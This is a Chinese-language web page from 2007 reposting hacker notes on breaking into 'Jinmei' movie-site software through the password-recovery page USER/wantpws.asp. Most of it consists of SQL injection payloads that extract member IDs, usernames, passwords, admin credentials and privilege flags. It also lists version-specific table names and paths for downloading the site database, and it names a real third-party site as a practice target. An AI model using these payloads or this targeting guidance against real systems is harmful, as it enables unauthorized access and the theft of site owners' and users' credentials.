快捷導(dǎo)航

金梅電影系統(tǒng)破解筆記（破解率80％以上）

更新時(shí)間：2007年01月16日 00:00:00 作者：

金梅電影系統(tǒng)破解筆記（破解率80%以上）
從我在265.com的黑客日記本中拷貝出，絕對(duì)珍藏?。。。。。。。?nbsp;
如果以后有機(jī)會(huì)，我會(huì)公開我的日記

金梅3幾乎不存在了，如果有可以用

黃金眼（上篇14個(gè)后臺(tái)那篇有上傳的注冊(cè)版）
不會(huì)用的可以看怪狗的黃金眼動(dòng)畫教程

或者臭要飯的寫的絕世猜解SQL注入器（這可是個(gè)好東東啊）

下面的東西有些概要，基本上是看
黑客x檔案 4期和 5期的總結(jié)出的筆記
針對(duì)現(xiàn)在網(wǎng)上的所有金梅版本好象都有效！?。。。。?nbsp;
不過那些收費(fèi)站都是騙人的，里面全是盜連，壞連?。。。。。。。?！
我破解了n個(gè)站點(diǎn)，只有幾個(gè)是好的

特別注意?。。。。耗切┐a都是在USER/wantpws.asp 頁注入的

你注冊(cè)用戶名： lamianbu
密碼提示問題： lamianbu
密友提示答案：（填入方法1和方法2中的代碼）

其實(shí)，前兩項(xiàng)，和第三項(xiàng)的開頭隨便填的，不相同也行
我都填a的

還要注意！?。?！
返回頁“你的密碼是”后面其實(shí)不是密碼?。。。。。。。。。?nbsp;

比如方法2 前三次分別得到的是

id（沒用）
用戶名（登陸用）
密碼（登陸用）

金梅4SQL注入

心情：　　 2004-5-14 21:58:26 　晴朗　星期五　　收藏：

login.asp
Register
高級(jí)管理員登錄. 用名：, 密碼：,

Register高級(jí)管理員登錄. 用名：, 密碼：,

USER/wantpws.asp
如果你忘記了自己的密碼
如果你忘記了自己的密碼，請(qǐng)?jiān)谌缦卤韱卫镙斎肽愕拿艽a提示信
息！. 你注冊(cè)用戶名：密碼提示問題：密友提示答案：. 返回首
頁.

方法1

得注冊(cè)用戶名：
lamianbu 'union select userid from users where oklook=3 or '0

oklook=x
0游1普2白3黃4鉆（4手5鉆）

得密碼（可能不對(duì)應(yīng)，所以推薦方法2）：
注冊(cè)用戶名處填用戶名' or '1=1

方法2

得用戶id為xxx：
lamianbu 'union select id from users where oklook=3 or '0

得id對(duì)應(yīng)用戶名：
lamianbu 'union select userid from users where id=xxx or '0

得id對(duì)應(yīng)密碼：
lamianbu 'union select password from users where id=xxx or '0

得管理員用戶名：
lamianbu 'union select name from password where id>=1 or '0

得管理員密碼：（金梅4有md5加密，看到的是16位亂碼）
lamianbu 'union select pwd from password where id>=1 or '0

表名：金梅4為：fdg85675fd
會(huì)員版為：password
有些版本為：okwiantgo

驗(yàn)證管理員權(quán)限：
lamianbu 'union select flag from password where id>=1
返回1超，2高，3初，4無

login.asp
findaccount.asp
構(gòu)造一個(gè)變絕對(duì)路徑
findaccount.asp?name=xxx&pwd=xxx

網(wǎng)際快車得數(shù)據(jù)庫：
movie/admin9988.asp
金梅4為：data/admin2000.asp 或 data/admin2002.asp
下載后改為admin9988.mdb
拿這頁練練手啊
破解出黃金帳號(hào)和密碼請(qǐng)不要修改和公布（后來人也要練手?。?nbsp;
登陸進(jìn)去記得走時(shí)要退出登陸（一個(gè)帳號(hào)不能幾人同時(shí)用的）
http://www.westedu.org/mov/USER/wantpws.asp
更多金梅去 google 找

實(shí)際上金梅系統(tǒng)沒有這頁也可以
構(gòu)造出同版本的類似頁進(jìn)行注入